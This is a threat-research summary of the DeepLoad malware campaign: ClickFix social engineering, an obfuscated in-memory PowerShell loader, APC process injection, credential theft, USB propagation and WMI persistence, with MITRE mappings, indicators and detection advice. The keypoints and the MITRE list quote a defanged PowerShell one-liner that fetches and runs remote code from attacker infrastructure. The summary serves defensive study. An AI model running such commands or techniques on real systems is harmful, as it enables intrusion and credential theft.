Threat Research

DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion

Reliaquest
DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion
ReliaQuest observed a fileless campaign called DeepLoad that uses ClickFix social engineering to execute an obfuscated PowerShell loader, compile an in-memory injector, and perform APC process injection into trusted processes like LockAppHost.exe while immediately stealing credentials. The campaign achieves persistence via scheduled tasks, USB propagation, and hidden WMI event subscriptions that allowed reinfection days after apparent cleanup, so defenders should enable PowerShell Script Block Logging, audit WMI subscriptions, and rotate exposed credentials. #DeepLoad #ClickFix

Keypoints

  • Initial access via ClickFix social engineering: users are tricked into pasting and running a command (powershell.exe -ep Bypass -Command “iex(irm hxxp://… )”) that pulls the in-memory loader.
  • The PowerShell loader uses massive, likely AI-generated noise and an XOR decryption routine to avoid static scanning and never writes the decoded payload to disk.
  • DeepLoad compiles a temporary C# DLL via Add-Type and injects shellcode into trusted processes (LockAppHost.exe, makecab.exe, Magnify.exe) using APC injection to run in-memory inside a legitimate host process.
  • Credential theft runs independently via filemanager.exe and a malicious browser extension, capturing typed credentials, saved passwords, session tokens, and exfiltrating them over a separate C2 channel.
  • The malware spread to removable USB drives by dropping disguised shortcut installers (e.g., ChromeSetup.lnk), enabling propagation to other hosts without operator interaction.
  • Standard cleanup missed WMI event subscriptions used for persistence; a surviving subscription re-executed the attack three days after the host appeared clean.
  • Detection recommendations: enable PowerShell Script Block Logging, monitor mshta.exe outbound callbacks and anomalous QueueUserAPC activity, audit and remove unknown WMI subscriptions, and rotate all credentials exposed during the infection window.

MITRE Techniques

  • [T1204 ] User Execution – Attackers relied on ClickFix social engineering to get users to run attacker-supplied commands directly. (‘ClickFix is a social engineering technique that gets users to run the attacker’s commands themselves.’)
  • [T1059.001 ] PowerShell – The initial command used PowerShell with an execution policy bypass to retrieve and execute the loader in memory. (‘powershell.exe -ep Bypass -Command “iex(irm hxxp://:3015/index)”‘)
  • [T1218.005 ] Mshta (Signed Binary Proxy Execution) – mshta.exe was used to reach attacker staging infrastructure and pull down the obfuscated PowerShell loader. (‘mshta.exe … reached the attacker’s staging infrastructure and pulled down an obfuscated PowerShell loader.’)
  • [T1105 ] Ingress Tool Transfer – The loader and supporting components were retrieved from attacker-controlled staging infrastructure after the user-executed command. (‘retrieves and executes the payload directly’)
  • [T1055 ] Process Injection – The campaign used APC injection to write shellcode into a suspended process and queue execution via QueueUserAPC. (‘uses asynchronous procedure call (APC) injection … QueueUserAPC’)
  • [T1047 ] Windows Management Instrumentation – WMI event subscriptions were created to re-execute the chain later, enabling reinfection after remediation. (‘WMI event subscription … re-executed the attack three days later’)
  • [T1555.003 ] Credentials from Web Browsers – The actor scraped stored browser passwords from hosts as part of credential theft. (‘Stored credential scraping pulls saved browser passwords directly from the host.’)
  • [T1056.001 ] Input Capture: Keylogging – The campaign captured credentials as users typed them, intercepting live input rather than only stored secrets. (‘DeepLoad captures credentials as users type them’)
  • [T1176 ] Browser Extensions – A malicious browser extension was dropped and registered to intercept and exfiltrate typed credentials and session data across browser sessions. (‘drops and registers a malicious browser extension that captures credentials as users type them’)
  • [T1091 ] Replication Through Removable Media – The malware copied many deceptive shortcut files to connected USB drives to facilitate spread to other hosts. (‘Over 40 files were written to the drive … ChromeSetup.lnk, Firefox Installer.lnk, AnyDesk.lnk’)
  • [T1041 ] Exfiltration Over C2 Channel – filemanager.exe communicated to a distinct C2 channel and exfiltrated harvested credentials independent of the main loader’s channel. (‘filemanager.exe uses a distinct command-and-control (C2) channel with failover domains’)

Indicators of Compromise

  • [File name ] credential stealer and payload artifacts – filemanager.exe, popup.html
  • [File hash ] known artifact hashes from reported incidents – 6AABA685669D779EF8BE8F7F4231096CFA, AB450927B37E1B68E2BE68832C354AC600, and other hashes in the report
  • [Domain ] attacker staging and support infrastructure – holiday-updateservice[.]com, forest-entity[.]cc, and hell1-kitty[.]cc
  • [URL path ] USB-tracking C2 indicator – /t1_usb observed in traffic to attacker infrastructure
  • [Shortcut filenames ] USB propagation artifacts disguised as installers – ChromeSetup.lnk, Firefox Installer.lnk
  • [Process name ] injected or abused Windows processes – LockAppHost.exe, WmiPrvSE.exe

Read more: https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion/